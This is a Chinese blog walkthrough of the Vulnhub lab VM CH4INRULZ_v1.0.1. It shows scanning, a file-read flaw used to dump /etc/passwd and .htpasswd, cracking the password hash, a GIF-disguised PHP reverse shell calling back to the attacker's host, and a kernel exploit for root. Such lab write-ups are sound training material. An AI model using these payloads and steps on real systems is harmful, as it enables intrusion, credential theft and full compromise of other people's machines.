OSCP - CH4INRULZ_v1.0.1 的破解

最新推荐文章于 2024-07-12 14:08:12 发布
最新推荐文章于 2024-07-12 14:08:12 发布
阅读量2.1k 收藏 2
点赞数 1
分类专栏: OSCP-CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kevinhanser/article/details/88182598
版权

本文主要记录对 CH4INRULZ_v1.0.1 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com
博客集:面向 CTF 的 OSCP 破解系列
下载链接:CH4INRULZ_v1.0.1

  1. 系统为DHCP,不知道IP,可以使用 netdiscover

     root@kali:~# netdiscover -r 10.10.10.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                               
                                                                                                                                                              
  6 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 360                                                                                             
  _____________________________________________________________________________
    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
  -----------------------------------------------------------------------------
  10.10.10.1      00:50:56:c0:00:08      2     120  VMware, Inc.                                                                                              
  10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.                                                                                              
  10.10.10.168    00:0c:29:15:19:a3      2     120  VMware, Inc.                                                                                              
  10.10.10.254    00:50:56:e8:71:43      1      60  VMware, Inc.

  2. 发现IP为 10.10.10.168,下面进行端口发现

     root@kali:~# nmap -A 10.10.10.168 -p 1-65535 -T4
 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 22:53 EST
 Nmap scan report for 10.10.10.168
 Host is up (0.00039s latency).
 Not shown: 65531 closed ports
 PORT     STATE SERVICE VERSION
 21/tcp   open  ftp     vsftpd 2.3.5
 |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | ftp-syst: 
 |   STAT: 
 | FTP server status:
 |      Connected to 10.10.10.166
 |      Logged in as ftp
 |      TYPE: ASCII
 |      No session bandwidth limit
 |      Session timeout in seconds is 300
 |      Control connection is plain text
 |      Data connections will be plain text
 |      At session startup, client count was 3
 |      vsFTPd 2.3.5 - secure, fast, stable
 |_End of status
 22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
 |   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
 |_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
 80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
 |_http-server-header: Apache/2.2.22 (Ubuntu)
 |_http-title: FRANK's Website | Under development
 8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
 |_http-server-header: Apache/2.2.22 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html).
 MAC Address: 00:0C:29:15:19:A3 (VMware)
 Device type: general purpose
 Running: Linux 2.6.X
 OS CPE: cpe:/o:linux:linux_kernel:2.6
 OS details: Linux 2.6.19 - 2.6.36
 Network Distance: 1 hop
 Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
 TRACEROUTE
 HOP RTT     ADDRESS
 1   0.39 ms 10.10.10.168
 
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds

    探测发现存在21、22、80、8011端口,首先对 21 端口进行排查

     PS C:\Users\John> ftp 10.10.10.168
 连接到 10.10.10.168。
 220 (vsFTPd 2.3.5)
 200 Always in UTF8 mode.
 用户(10.10.10.168:(none)): Anonymous
 331 Please specify the password.
 密码:
 230 Login successful.
 ftp>
 ftp> ls -la

    ftp 服务器未发现有价值的线索,另外,vsftpd的版本未发现现有的漏洞

     root@kali:~# searchsploit vsftpd
 --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
  Exploit Title                                                                                                       |  Path
                                                                                                                      | (/usr/share/exploitdb/)
 --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                       | exploits/linux/dos/5814.pl
 vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                       | exploits/windows/dos/31818.sh
 vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                       | exploits/windows/dos/31819.pl
 vsftpd 2.3.2 - Denial of Service                                                                                     | exploits/linux/dos/16270.c
 vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                               | exploits/unix/remote/17491.rb
 --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Shellcodes: No Result
 root@kali:~#

    22 端口的 opensshOpenSSH 5.9p1 Debian 5ubuntu1.10 也没发现版本漏洞

  3. 下面对 8011 端口进行测试

    使用 dirb 进行目录暴破

     oot@kali:~# dirb http://10.10.10.168:8011
 
 -----------------
 DIRB v2.22    
 By The Dark Raver
 -----------------
 
 START_TIME: Mon Mar  4 23:15:57 2019
 URL_BASE: http://10.10.10.168:8011/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 
 -----------------
 
 GENERATED WORDS: 4612                                                          
 
 ---- Scanning URL: http://10.10.10.168:8011/ ----
 ==> DIRECTORY: http://10.10.10.168:8011/api/                                                                                                                 
 + http://10.10.10.168:8011/index.html (CODE:200|SIZE:30)                                                                                                     
 + http://10.10.10.168:8011/server-status (CODE:403|SIZE:295)                                                                                                 
                                                                                                                                                              
 ---- Entering directory: http://10.10.10.168:8011/api/ ----
 + http://10.10.10.168:8011/api/index.html (CODE:200|SIZE:351)                                                                                                
                                                                                                                                                              
 -----------------
 END_TIME: Mon Mar  4 23:16:02 2019
 DOWNLOADED: 9224 - FOUND: 3

    使用 nikto 进行漏洞扫描

     oot@kali:~# nikto -C all -h 10.10.10.168:8011
 - Nikto v2.1.6
 ---------------------------------------------------------------------------
 + Target IP:          10.10.10.168
 + Target Hostname:    10.10.10.168
 + Target Port:        8011
 + Start Time:         2019-03-04 23:16:04 (GMT-5)
 ---------------------------------------------------------------------------
 + Server: Apache/2.2.22 (Ubuntu)
 + Server leaks inodes via ETags, header found with file /, inode: 1052109, size: 30, mtime: Sat Apr 14 08:00:08 2018
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
 + OSVDB-3233: /icons/README: Apache default file found.
 + 26131 requests: 0 error(s) and 7 item(s) reported on remote host
 + End Time:           2019-03-04 23:17:16 (GMT-5) (72 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested

    对以上扫描结果进行访问测试,发现 http://10.10.10.168:8011/api/index.html 有提示信息

    在这里插入图片描述

    分别对提示中的四个页面进行测试,发现 http://10.10.10.168:8011/api/files_api.php 有回显信息,并且提示信息中提到了 file 参数

    在这里插入图片描述

    下面对file 参数进行测试,查看是否可以利用,比如访问“http://10.10.10.168:8011/api/files_api.php?file=/etc/passwd”,发现有拦截,说明这里应该是可以利用的

    在这里插入图片描述

    下面尝试使用命令行来进行测试

     root@kali:~# curl -X POST -d "file=/etc/passwd" http://10.10.10.168:8011/api/files_api.php
 
 <head>
   <title>franks website | simple website browser API</title>
 </head>
 
 root:x:0:0:root:/root:/bin/bash
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 syslog:x:101:103::/home/syslog:/bin/false
 frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
 sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
 ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false

  4. 下面对 80 端口进行探测

    首先使用 dirb 对网站进行目录爆破

     oot@kali:~# dirb http://10.10.10.168
 
 -----------------
 DIRB v2.22    
 By The Dark Raver
 -----------------
 
 START_TIME: Mon Mar  4 23:06:36 2019
 URL_BASE: http://10.10.10.168/
 WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
 
 -----------------
 
 GENERATED WORDS: 4612                                                          
 
 ---- Scanning URL: http://10.10.10.168/ ----
 + http://10.10.10.168/cgi-bin/ (CODE:403|SIZE:288)                                                                                                           
 ==> DIRECTORY: http://10.10.10.168/css/                                                                                                                      
 + http://10.10.10.168/development (CODE:401|SIZE:479)                                                                                                        
 ==> DIRECTORY: http://10.10.10.168/img/                                                                                                                      
 + http://10.10.10.168/index (CODE:200|SIZE:334)                                                                                                              
 + http://10.10.10.168/index.html (CODE:200|SIZE:13516)                                                                                                       
 ==> DIRECTORY: http://10.10.10.168/js/                                                                                                                       
 + http://10.10.10.168/LICENSE (CODE:200|SIZE:1093)                                                                                                           
 + http://10.10.10.168/robots (CODE:200|SIZE:21)                                                                                                              
 + http://10.10.10.168/robots.txt (CODE:200|SIZE:21)                                                                                                          
 + http://10.10.10.168/server-status (CODE:403|SIZE:293)                                                                                                      
 ==> DIRECTORY: http://10.10.10.168/vendor/                                                                                                                   
                                                                                                                                                              
 ---- Entering directory: http://10.10.10.168/css/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                              
 ---- Entering directory: http://10.10.10.168/img/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                              
 ---- Entering directory: http://10.10.10.168/js/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                              
 ---- Entering directory: http://10.10.10.168/vendor/ ----
 (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
     (Use mode '-w' if you want to scan it anyway)
                                                                                
 -----------------
 END_TIME: Mon Mar  4 23:06:39 2019
 DOWNLOADED: 4612 - FOUND: 8

    发现目录cgi-bin、development、css、img、js、vendor目录,重点发现需要密码验证的目录(后台页面)

     root@kali:~# dirb http://10.10.10.168 | grep "CODE:401"
 + http://10.10.10.168/development (CODE:401|SIZE:479)

    然后使用 nikto 对网站进行扫描

     root@kali:~# nikto -C all -h 10.10.10.168
 - Nikto v2.1.6
 ---------------------------------------------------------------------------
 + Target IP:          10.10.10.168
 + Target Hostname:    10.10.10.168
 + Target Port:        80
 + Start Time:         2019-03-04 23:08:04 (GMT-5)
 ---------------------------------------------------------------------------
 + Server: Apache/2.2.22 (Ubuntu)
 + Server leaks inodes via ETags, header found with file /, inode: 1051931, size: 13516, mtime: Sat Apr 14 09:39:32 2018
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
 + Uncommon header 'tcn' found, with contents: list
 + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.html.bak
 + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
 + OSVDB-3268: /img/: Directory indexing found.
 + OSVDB-3092: /img/: This might be interesting...
 + OSVDB-3233: /icons/README: Apache default file found.
 + 26280 requests: 0 error(s) and 11 item(s) reported on remote host
 + End Time:           2019-03-04 23:09:13 (GMT-5) (69 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested

    发现 img 目录和 /icons/README 文件,另外提示 index 有两个文件:“index.html”和“index.html.bak”

    下载此文件:

     root@kali:~# wget http://10.10.10.168/index.html.bak
 --2019-03-04 23:36:01--  http://10.10.10.168/index.html.bak
 Connecting to 10.10.10.168:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 334 [application/x-trash]
 Saving to: ‘index.html.bak’
 
 index.html.bak                          100%[=============================================================================>]     334  --.-KB/s    in 0s      
 
 2019-03-04 23:36:01 (71.7 MB/s) - ‘index.html.bak’ saved [334/334]
 
 root@kali:~# cat index.html.bak 
 <html><body><h1>It works!</h1>
 <p>This is the default web page for this server.</p>
 <p>The web server software is running but no content has been added, yet.</p>
 <a href="/development">development</a>
 <!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
 </body></html>

    查看内容,可以看到用户名和密码 frank:$apr1 1 o I G D E D K 1oIGDEDK 1oIGDEDK/aVFPluYt56UvslZMBDoC0

    或者是执行命令

     root@kali:~# curl -X POST -d "file=/etc/.htpasswd" http://10.10.10.168:8011/api/files_api.php
 
 <head>
   <title>franks website | simple website browser API</title>
 </head>
 
 frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

    对上面的账号密码进行暴力猜解:

    frank:$apr1 1 o I G D E D K 1oIGDEDK 1oIGDEDK/aVFPluYt56UvslZMBDoC0

    可以使用 hash-identifier,判断 hash类型,然后使用 john the rapper 暴力猜解

     root@kali:~# hash-identifier 
    #########################################################################
    #	 __  __ 		    __		 ______    _____	   #
    #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
    #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
    #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
    #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
    #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
    #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
    #								 By Zion3R #
    #							www.Blackploit.com #
    #						       Root@Blackploit.com #
    #########################################################################
 
    -------------------------------------------------------------------------
  HASH: $apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
 
 Possible Hashs:
 [+]  MD5(APR)
 
    -------------------------------------------------------------------------

    然后使用 john 爆破密码,john 的使用格式是将密码复制进文件然后进行猜解的

     root@kali:~# cat hash.txt 
 frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
 
 root@kali:~# john hash.txt 
 Using default input encoding: UTF-8
 Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3])
 Will run 2 OpenMP threads
 Proceeding with single, rules:Wordlist
 Press 'q' or Ctrl-C to abort, almost any other key for status
 Warning: Only 22 candidates buffered for the current salt, minimum 48
 needed for performance.
 Warning: Only 33 candidates buffered for the current salt, minimum 48
 needed for performance.
 frank!!!         (frank)
 1g 0:00:00:00 DONE 1/3 (2019-03-05 00:05) 50.00g/s 9950p/s 9950c/s 9950C/s FRANK1..gfrank
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed

    现在我们有了密码frank:frank!!!,使用密码登录 development 目录

    在这里插入图片描述

    找到关键词 uploader ,尝试作为路径访问

    在这里插入图片描述

    猜测应该有文件上传漏洞,进行登录测试,上传发现只支持图片格式

    在这里插入图片描述

    在 kali 中找一个 php 反弹木马尝试上传,格式化成 GIF98 文件头的图片格式

     root@kali:~# cat reerse_php.gif 
 	GIF98
 	<?php
 	$sock=fsockopen("10.10.10.166",4444);
 	exec("/bin/sh -i <&3 >&3 2>&3");
 	?>

    上传成功:

    在这里插入图片描述

    但是即使上传成功,也不能利用,这时候尝试目录爆破。经过目录暴破发现还存在目录“http://10.10.10.168/development/uploader/FRANKuploads/”

    不知道 FRANKuploads 是哪里来的,仅新增一张图,其他的未做改变。

    在这里插入图片描述

    在这里插入图片描述

    在这里插入图片描述

    在kali 打开监听端口,然后访问反弹shell 的图片

     root@kali:~# nc -nvlp 4444
 retrying local 0.0.0.0:4444 : Address already in use

    另一个窗口打开:

     curl -X POST -d file=/var/www/development/uploader/FRANKuploads/reerse_php.gif 10.10.10.168:8011/api/files_api.php

    此时发现建立的连接,连上就断开了,判断是 反弹webshell 有问题,所以使用一个kali官方的反弹 shell:
    /usr/share/webshells/php/php-reverse-shell.php

    修改文件头为 GIF98,修改文件后缀为 gif,开始上传。

  5. 反弹shell

    使用 msf 或者 nc 设置监听 4444 端口,设置反弹 shell 的端口为 4444,监听

     root@kali:~# nc -nvlp 4444
 listening on [any] 4444 ...

    新窗口访问

     root@kali:~/Desktop# curl -X POST -d file=/var/www/development/uploader/FRANKuploads/php-reverse-shell4.gif  10.10.10.168:8011/api/files_api.php

    获得shell

     root@kali:~# nc -nvlp 4444
 listening on [any] 4444 ...
 connect to [10.10.10.166] from (UNKNOWN) [10.10.10.168] 37548
 Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
  06:26:47 up  2:36,  0 users,  load average: 0.00, 0.01, 1.64
 USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 /bin/sh: can't access tty; job control turned off

    更换为 bash

     $ python -c 'import pty; pty.spawn("/bin/bash")' 
 www-data@ubuntu:/$ id
 id
 uid=33(www-data) gid=33(www-data) groups=33(www-data)

  6. 提权

    查看内核版本

     www-data@ubuntu:/home/frank$ uname -a
 uname -a
 Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux

    搜索内核版本漏洞

     root@kali:~# searchsploit linux 2.6.35
 --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
  Exploit Title                                                                                                       |  Path
                                                                                                                      | (/usr/share/exploitdb/)
 --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service                                                     | exploits/linux/dos/36425.txt
 --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Shellcodes: No Result

    在 kali 设置简单的 HTTP 服务器

     root@kali:/var/www/html# python -m SimpleHTTPServer 80

    靶机执行命令

     www-data@ubuntu:/var/www$ cd /var/tmp
 cd /var/tmp
 www-data@ubuntu:/var/tmp$ wget http://10.10.10.166/15285.c     
 wget http://10.10.10.166/15285.c
 --2019-03-05 06:51:42--  http://10.10.10.166/15285.c
 Connecting to 10.10.10.166:80... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 7155 (7.0K) [text/x-csrc]
 Saving to: `15285.c'
 
 100%[======================================>] 7,155       --.-K/s   in 0s      
 
 2019-03-05 06:51:42 (68.9 MB/s) - `15285.c' saved [7155/7155]
 
 www-data@ubuntu:/var/tmp$ ls
 ls
 15285.c
 		
 www-data@ubuntu:/var/tmp$ ls
 ls
 15285.c
 www-data@ubuntu:/var/tmp$ gcc 15285.c -o 15285
 gcc 15285.c -o 15285
 www-data@ubuntu:/var/tmp$ chmod 777 15285
 chmod 777 15285
 www-data@ubuntu:/var/tmp$ ./15285
 ./15285
 [*] Linux kernel >= 2.6.30 RDS socket exploit
 [*] by Dan Rosenberg
 [*] Resolving kernel addresses...
  [+] Resolved security_ops to 0xffffffff81ce8df0
  [+] Resolved default_security_ops to 0xffffffff81a523e0
  [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
  [+] Resolved commit_creds to 0xffffffff810852b0
  [+] Resolved prepare_kernel_cred to 0xffffffff81085780
 [*] Overwriting security ops...
 [*] Overwriting function pointer...
 [*] Triggering payload...
 [*] Restoring function pointer...
 [*] Got root!
 # 
 # python -c 'import pty; pty.spawn("/bin/bash")' 
 
 root@ubuntu:/var/tmp# id
 id
 uid=0(root) gid=0(root) groups=0(root)

    至此,已完成。

网络安全打工人
关注
专栏目录
signature=2539a1010ee41757e1f0383459d78642,package-lock.json
weixin_42197841的博客
05-30 6394
{"name": "ElectronPackage","version": "1.0.0","lockfileVersion": 1,"requires": true,"dependencies": {"@electron/get": {"version": "1.7.2","resolved": "https://registry.npmjs.org/@electron/get/-/get-1....
靶场练习第八天~vulnhub靶场之CH4INRULZ_v1.0.1
qq_57976347的博客
02-02 1806
一、前期准备 1.靶机下载 链接: 百度网盘 请输入提取码 提取码: z37y 2.用命令ifconfig查看kali 二、信息收集 1.主机发现,使用nmap命令 具体使用方法:nmap -sP 192.168.101.0/24 2.查看该靶机开放了哪些端口 nmap -A 192.168.101.109 直接访问80端口 3.用dirb命令,扫描隐藏文件或者网址 (1)使用 dirb http://192.168.101.109,扫描到一个development..
6Days_Lab-v1.0.1靶机
最新发布
ybkj6666的博客
07-12 694
使用arp-scan来查看,排除得到我们的目标ip为192.168.187.160。
靶机CH4INRULZ_v1.0.1
weixin_43940853的博客
12-12 546
kali : 192.168.230.236 靶机 : 192.168.230.238 与之前的靶机不同,这次有ftp和8011,先登陆ftp看看 发现可以匿名登陆,但是进来毛都没有,一开始我想在kali上直接ftp,然后怎么搞都不行,总是提示ftp命令不存在(这个以后再说) 接着看看80没有什么发现 找不到可入手的地方(80网页先暂时放一放) 一开始有一个8011端口,我们访问一下 访问之...
CH4INRULZ_v1.0.1内网渗透靶场
weixin_51339377的博客
03-17 493
nmap -T4 -A -p- 192.168.206.146 这里我们借助工具dirsearch对该网站进行目录扫描 http://192.168.206.146/development/ 然后再通过御剑进行扫描 http://192.168.206.146/index.html.bak frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 通过工具john进行一下解密 把解密结果存储到相应文件中 cd ...
John the ripper破解Linux密码
weixin_51387754的博客
05-04 2849
一.John 在linux系统上创建一个名为happy的新用户,其密码为123 (kali㉿kali)-[~] └─$ su root Password: ┌──(root????kali)-[/home/kali] └─# adduser happy Adding user `happy' ... Adding new group `happy' (1001) ... Adding new user `happy' (1001)
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
java红酒网站源码-oscp-notes:oscp-notes
06-05
java网站源码OSCP - PWK(使用 Kali 进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH...
java红酒网站源码-OSCP-Notes:OSCP-笔记
06-05
java网站源码OSCP-笔记 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
靶机CH4INRULZ_V1练习报告1
08-08
靶机CH4INRULZ_V1练习报告1
vulnhub靶机-sunset:nightfall
臭nana的博客
07-17 827
1、找到靶机ip:192.168.0.125 nmap -sn 192.168.0.0/24 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.0.125 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.0.125 Host is up (0.0018s latency). Not shown: 65529 closed ports PORT STATE SERV
kd718和kb688参数_GJK SPP 5BGK AEC F04A tB9 D4 RMP
热门推荐
weixin_34570232的博客
01-13 6万+
专业供应各种小封装贴片二极管 贴片三极管 贴片集成电路 贴片集成IC 专业反查贴片元件,以下为部分元件的MARKING 代码 CODE 丝印 顶标 简码 印字 镭射 缩写 标记 打字 标志 烙印 表贴 本体 BRAND 印章 原码 SYMBOL 标识 MARK TOP TTWIC MARK PART MARKING 6M.R V57N p8Q V16 203 83U 19 4C7 B8LW 109...
网安实训(六)| 利用Burpsuite代理并进行弱密码爆破
朔方鸟的博客
02-17 5107
Burpsuite是一个常用的web渗透软件,提供了一系列的有关web安全攻击的工具,本实验将使用该工具进行弱密码的爆破。
vulhub - CH4INRULZ_v1.0.1 writeup
Jiajiajiang_的博客
04-01 1439
主机来源:www.vulnhub.com 下载链接:https://www.vulnhub.com/entry/ch4inrulz-101,247/ 准备工作: 下载.ova文件,直接双击即可安装成功 设置连接方式为NAT,攻击机器使用kali,也设置为NAT。 发现IP 刚安装的虚拟机并不知道IP地址,使用netdiscover发现IP。 简介下netdiscover的用法...
靶场渗透CH4INRULZ_v1.0.1
qq_35664104的博客
09-18 502
靶机环境下载地址:[下载] ova下载下来后直接导入virtualbox即可(https://www.vulnhub.com/entry/ch4inrulz-101,247/) 好久没有来做内网渗透了,碰巧遇到一个新鲜点的靶场,就来试一下。 kali:192.168.0.100 靶机: 192.168.0.101 先扫一下端口 nmap -sS -A -p- 192.168.0.101 开启了ftp,ssh,http服务,打开他的网址上去一看,是一个未完成的个人博客。在他的网站上并没有找到什么线索,u
VulnHub靶场之CH4INRULZ_v1.0.1
A_dmin的博客
10-31 3101
VulnHub靶场之CH4INRULZ_v1.0.1 继续靶机实验,老样子,先打开kali和靶机 查看kali的IP地址,然后进行主机查找 使用nmap命令:nmap -sP 192.168.80.1/24
OSCP备考-1
一个安全路上的菜鸟
11-30 1055
Hackthebox 整起 最简单的一题
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值